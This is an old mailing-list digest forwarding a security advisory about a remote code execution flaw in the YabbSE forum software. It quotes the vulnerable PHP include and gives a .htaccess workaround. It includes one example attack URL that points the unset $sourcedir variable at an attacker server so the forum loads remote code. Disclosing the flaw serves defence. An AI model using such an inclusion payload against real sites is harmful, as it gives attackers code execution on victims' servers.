[Please use the method specified to prevent this vulnerability if you use YaBBSE -- Raju]
This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Message-Id: <[EMAIL PROTECTED]> From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: YabbSE Remote Code Execution Vulnerability Date: Tue, 21 Jan 2003 15:09:48 -0800 YabbSE Remote Code Execution Vulnerability ( By Mindwarper :: [EMAIL PROTECTED] :: ) <------- -------> ---------------------- Vendor Information: ---------------------- Homepage : http://www.yabbse.org Vendor : informed Mailed advisory: 21/01/02 Vender Response : None ---------------------- Affected Versions: ---------------------- All versions prior to 1.5.0 ---------------------- Vulnerability: ---------------------- YabbSE keeps all of it's function includes in a directory called "Sources" which is not protected. Inside this directory a file called Packages.php exists. This file is supposed to be included and not called directly, but if an attacker calls it directly he/she may cause the script to run remote arbitrary code. Bellow are a couple of the first lines in Packages.php: ******** .. global $adminplver; $Packagesphpver="YaBB SE 1.4.1"; $safe_mode = ini_get("safe_mode"); $pacmanver = "1.4.1"; include_once("$sourcedir/Packer.php"); .. ******** We can see here that the variable $sourcedir is never defined and therefore may be defined through global injection. Example: http://victim/yabbse/Sources/Packages.php?sourcedir=http://attacker/ where the attacker server has a file called Packer.php. An attacker may execute remote code on the server with webserver permissions. Side-note: An attacker may also use this file for XSS attack on the server. ---------------------- Solution: ---------------------- Please check the vendor's website for new patches. As a temporary solution, create a .htaccess file that contains 'Deny from all'. Place it in the /Sources/ directory and that should block remote users from accessing it. ---------------------- Greetz: ---------------------- Hawkje, Truckle, Cyon, daemorhedron, Mithrandir <------- -------> Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 ------------------------------ End of this Digest ****************** -- Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/ It is the mind that moves ------------------------------------------------------- This SF.net email is sponsored by: Scholarships for Techies! Can't afford IT training? All 2003 ictp students receive scholarships. Get hands-on training in Microsoft, Cisco, Sun, Linux/UNIX, and more. www.ictp.com/training/sourceforge.asp _______________________________________________ linux-india-help mailing list [EMAIL PROTECTED] https://lists.sourceforge.net/lists/listinfo/linux-india-help
